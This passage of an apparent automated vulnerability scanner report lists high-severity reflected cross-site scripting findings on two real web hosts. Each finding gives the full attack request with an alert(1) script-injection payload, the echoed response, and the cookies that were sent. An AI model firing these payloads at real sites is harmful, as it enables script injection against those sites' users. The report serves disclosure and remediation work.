There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: idk=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQSTSCRD=JCBCPJMAPKIPKJHFCJIAJBAC; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:16 GMT
Connection: close
Content-Length: 8330
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=dk.imlive.com&ul=/waccess/2babb'style='x:expression(alert(1))'730ccb26132/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://dk.imlive.com:80/waccess/2babb'style='x:expression(alert(1))'730ccb26132/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.288. http://dk.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c286"><script>alert(1)</script>f1e7aab618f was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:53 GMT
Connection: close
Content-Length: 23170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.289. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11170717655@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38595"><script>alert(1)</script>39a25e102d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM38595"><script>alert(1)</script>39a25e102d6/2010DM/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM38595"><script>alert(1)</script>39a25e102d6/2010DM/1040289451/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.290. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11170717655@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0308"><script>alert(1)</script>e92931d1d13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe0308"><script>alert(1)</script>e92931d1d13/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe0308"><script>alert(1)</script>e92931d1d13/942944445/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.291. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11170717655@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2ff"><script>alert(1)</script>f34da647acb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11170717655@x23bb2ff"><script>alert(1)</script>f34da647acb?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1461687267/x23bb2ff"><script>alert(1)</script>f34da647acb/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.292. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11170717655@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b0c1"-alert(1)-"9121c6f6f8b was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3003b0c1"-alert(1)-"9121c6f6f8b HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3003b0c1"-alert(1)-"9121c6f6f8b";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.293. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11170717655@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac99f"-alert(1)-"1eef0d2354a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&ac99f"-alert(1)-"1eef0d2354a=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&ac99f"-alert(1)-"1eef0d2354a=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.294. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1120619784@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa20"><script>alert(1)</script>06e269b1e1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM4aa20"><script>alert(1)</script>06e269b1e1b/2010DM/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM4aa20"><script>alert(1)</script>06e269b1e1b/2010DM/1251469884/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.295. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1120619784@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4941c"><script>alert(1)</script>06ccdf3c634 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM4941c"><script>alert(1)</script>06ccdf3c634/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM4941c"><script>alert(1)</script>06ccdf3c634/101209483/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.296. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1120619784@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df8e4"><script>alert(1)</script>2ff75915346 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1120619784@x23df8e4"><script>alert(1)</script>2ff75915346?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/962173003/x23df8e4"><script>alert(1)</script>2ff75915346/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.297. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1120619784@x23

Issue detail

The value of the USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 291d7"-alert(1)-"efee496423e was submitted in the USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300291d7"-alert(1)-"efee496423e HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2485
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/ATTWL_11Q1_Cllctv_MobRON_300291d7"-alert(1)-"efee496423e";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.298. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1120619784@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6e8e"-alert(1)-"d03ef3df83b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300&f6e8e"-alert(1)-"d03ef3df83b=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2488
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/ATTWL_11Q1_Cllctv_MobRON_300&f6e8e"-alert(1)-"d03ef3df83b=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

